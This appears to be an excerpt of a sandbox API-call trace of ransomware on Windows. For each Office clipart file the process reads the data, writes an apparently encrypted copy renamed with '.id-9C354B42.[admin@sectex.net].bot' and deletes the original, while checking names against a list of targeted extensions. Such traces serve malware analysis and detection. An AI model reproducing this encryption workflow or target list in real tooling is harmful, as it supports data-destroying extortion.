	[0169.099] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.100] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.100] lstrlenW (lpString="J0152704.WMF") returned 12
	[0169.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152704.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0169.100] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1652) returned 1
	[0169.100] CloseHandle (hObject=0x37c) returned 1
	[0169.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152704.wmf")) returned 0x20
	[0169.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152704.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152704.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0169.101] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.101] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152704.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0169.101] GetLastError () returned 0x0
	[0169.101] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x674, lpOverlapped=0x0) returned 1
	[0169.153] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x680, lpOverlapped=0x0) returned 1
	[0169.154] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.154] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.154] SetEndOfFile (hFile=0x3b0) returned 1
	[0169.154] CloseHandle (hObject=0x3b0) returned 1
	[0169.154] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.154] SetEndOfFile (hFile=0x37c) returned 1
	[0169.156] CloseHandle (hObject=0x37c) returned 1
	[0169.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.161] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152704.wmf")) returned 1
	[0169.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.184] lstrlenW (lpString=".doc") returned 4
	[0169.184] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.184] lstrlenW (lpString=".docx") returned 5
	[0169.184] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.184] lstrlenW (lpString=".pdf") returned 4
	[0169.184] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.185] lstrlenW (lpString=".xls") returned 4
	[0169.185] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.185] lstrlenW (lpString=".xlsx") returned 5
	[0169.185] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.185] lstrlenW (lpString=".ppt") returned 4
	[0169.185] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.185] lstrlenW (lpString=".zip") returned 4
	[0169.185] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.185] lstrlenW (lpString=".rar") returned 4
	[0169.185] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.185] lstrlenW (lpString=".bz2") returned 4
	[0169.185] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.185] lstrlenW (lpString=".7z") returned 3
	[0169.185] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.193] lstrlenW (lpString=".dbf") returned 4
	[0169.193] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.193] lstrlenW (lpString=".1cd") returned 4
	[0169.193] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.193] lstrlenW (lpString=".jpg") returned 4
	[0169.193] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.193] lstrlenW (lpString=".doc") returned 4
	[0169.193] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.193] lstrlenW (lpString=".docx") returned 5
	[0169.193] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.193] lstrlenW (lpString=".pdf") returned 4
	[0169.193] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.193] lstrlenW (lpString=".xls") returned 4
	[0169.193] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.193] lstrlenW (lpString=".xlsx") returned 5
	[0169.193] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.194] lstrlenW (lpString=".ppt") returned 4
	[0169.194] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.194] lstrlenW (lpString=".zip") returned 4
	[0169.194] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.194] lstrlenW (lpString=".rar") returned 4
	[0169.194] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.194] lstrlenW (lpString=".bz2") returned 4
	[0169.194] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.194] lstrlenW (lpString=".7z") returned 3
	[0169.194] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.194] lstrlenW (lpString=".dbf") returned 4
	[0169.194] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.194] lstrlenW (lpString=".1cd") returned 4
	[0169.194] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 63
	[0169.194] lstrlenW (lpString=".jpg") returned 4
	[0169.194] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.194] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.194] lstrlenW (lpString="J0152892.WMF") returned 12
	[0169.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.273] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=10668) returned 1
	[0169.273] CloseHandle (hObject=0x1d8) returned 1
	[0169.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf")) returned 0x20
	[0169.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.280] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.280] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0169.281] GetLastError () returned 0x0
	[0169.281] ReadFile (in: hFile=0x124, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x29ac, lpOverlapped=0x0) returned 1
	[0169.303] WriteFile (in: hFile=0x188, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x29b0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x29b0, lpOverlapped=0x0) returned 1
	[0169.304] ReadFile (in: hFile=0x124, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.304] WriteFile (in: hFile=0x188, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.304] SetEndOfFile (hFile=0x188) returned 1
	[0169.304] CloseHandle (hObject=0x188) returned 1
	[0169.304] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.304] SetEndOfFile (hFile=0x124) returned 1
	[0169.308] CloseHandle (hObject=0x124) returned 1
	[0169.309] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.309] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf")) returned 1
	[0169.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.310] lstrlenW (lpString=".doc") returned 4
	[0169.310] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.310] lstrlenW (lpString=".docx") returned 5
	[0169.310] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.310] lstrlenW (lpString=".pdf") returned 4
	[0169.310] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.310] lstrlenW (lpString=".xls") returned 4
	[0169.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.310] lstrlenW (lpString=".xlsx") returned 5
	[0169.310] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.310] lstrlenW (lpString=".ppt") returned 4
	[0169.310] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.310] lstrlenW (lpString=".zip") returned 4
	[0169.310] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.310] lstrlenW (lpString=".rar") returned 4
	[0169.310] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.310] lstrlenW (lpString=".bz2") returned 4
	[0169.310] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.310] lstrlenW (lpString=".7z") returned 3
	[0169.310] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.310] lstrlenW (lpString=".dbf") returned 4
	[0169.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.310] lstrlenW (lpString=".1cd") returned 4
	[0169.310] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.310] lstrlenW (lpString=".jpg") returned 4
	[0169.310] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.311] lstrlenW (lpString=".doc") returned 4
	[0169.311] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.311] lstrlenW (lpString=".docx") returned 5
	[0169.311] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.311] lstrlenW (lpString=".pdf") returned 4
	[0169.311] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.311] lstrlenW (lpString=".xls") returned 4
	[0169.311] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.311] lstrlenW (lpString=".xlsx") returned 5
	[0169.311] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.311] lstrlenW (lpString=".ppt") returned 4
	[0169.311] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.311] lstrlenW (lpString=".zip") returned 4
	[0169.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.311] lstrlenW (lpString=".rar") returned 4
	[0169.311] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.311] lstrlenW (lpString=".bz2") returned 4
	[0169.311] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.311] lstrlenW (lpString=".7z") returned 3
	[0169.311] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.311] lstrlenW (lpString=".dbf") returned 4
	[0169.311] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.311] lstrlenW (lpString=".1cd") returned 4
	[0169.311] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63
	[0169.311] lstrlenW (lpString=".jpg") returned 4
	[0169.311] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.311] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.312] lstrlenW (lpString="J0153087.WMF") returned 12
	[0169.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153087.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.312] GetFileSizeEx (in: hFile=0x124, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1912) returned 1
	[0169.312] CloseHandle (hObject=0x124) returned 1
	[0169.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153087.wmf")) returned 0x20
	[0169.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153087.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153087.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.313] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.313] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153087.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0169.314] GetLastError () returned 0x0
	[0169.314] ReadFile (in: hFile=0x124, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x778, lpOverlapped=0x0) returned 1
	[0169.319] WriteFile (in: hFile=0x188, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x780, lpOverlapped=0x0) returned 1
	[0169.320] ReadFile (in: hFile=0x124, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.320] WriteFile (in: hFile=0x188, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.320] SetEndOfFile (hFile=0x188) returned 1
	[0169.320] CloseHandle (hObject=0x188) returned 1
	[0169.320] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.320] SetEndOfFile (hFile=0x124) returned 1
	[0169.323] CloseHandle (hObject=0x124) returned 1
	[0169.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.323] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153087.wmf")) returned 1
	[0169.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.326] lstrlenW (lpString=".doc") returned 4
	[0169.326] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.326] lstrlenW (lpString=".docx") returned 5
	[0169.326] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.326] lstrlenW (lpString=".pdf") returned 4
	[0169.326] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.326] lstrlenW (lpString=".xls") returned 4
	[0169.326] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.326] lstrlenW (lpString=".xlsx") returned 5
	[0169.326] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.326] lstrlenW (lpString=".ppt") returned 4
	[0169.326] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.327] lstrlenW (lpString=".zip") returned 4
	[0169.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.327] lstrlenW (lpString=".rar") returned 4
	[0169.327] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.327] lstrlenW (lpString=".bz2") returned 4
	[0169.327] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.327] lstrlenW (lpString=".7z") returned 3
	[0169.327] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.327] lstrlenW (lpString=".dbf") returned 4
	[0169.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.327] lstrlenW (lpString=".1cd") returned 4
	[0169.327] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.327] lstrlenW (lpString=".jpg") returned 4
	[0169.327] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.327] lstrlenW (lpString=".doc") returned 4
	[0169.327] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.327] lstrlenW (lpString=".docx") returned 5
	[0169.327] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.327] lstrlenW (lpString=".pdf") returned 4
	[0169.327] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.327] lstrlenW (lpString=".xls") returned 4
	[0169.327] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.327] lstrlenW (lpString=".xlsx") returned 5
	[0169.327] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.327] lstrlenW (lpString=".ppt") returned 4
	[0169.327] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.328] lstrlenW (lpString=".zip") returned 4
	[0169.328] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.328] lstrlenW (lpString=".rar") returned 4
	[0169.328] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.328] lstrlenW (lpString=".bz2") returned 4
	[0169.328] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.328] lstrlenW (lpString=".7z") returned 3
	[0169.328] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.328] lstrlenW (lpString=".dbf") returned 4
	[0169.328] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.328] lstrlenW (lpString=".1cd") returned 4
	[0169.328] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 63
	[0169.328] lstrlenW (lpString=".jpg") returned 4
	[0169.328] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.328] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.329] lstrlenW (lpString="J0153089.WMF") returned 12
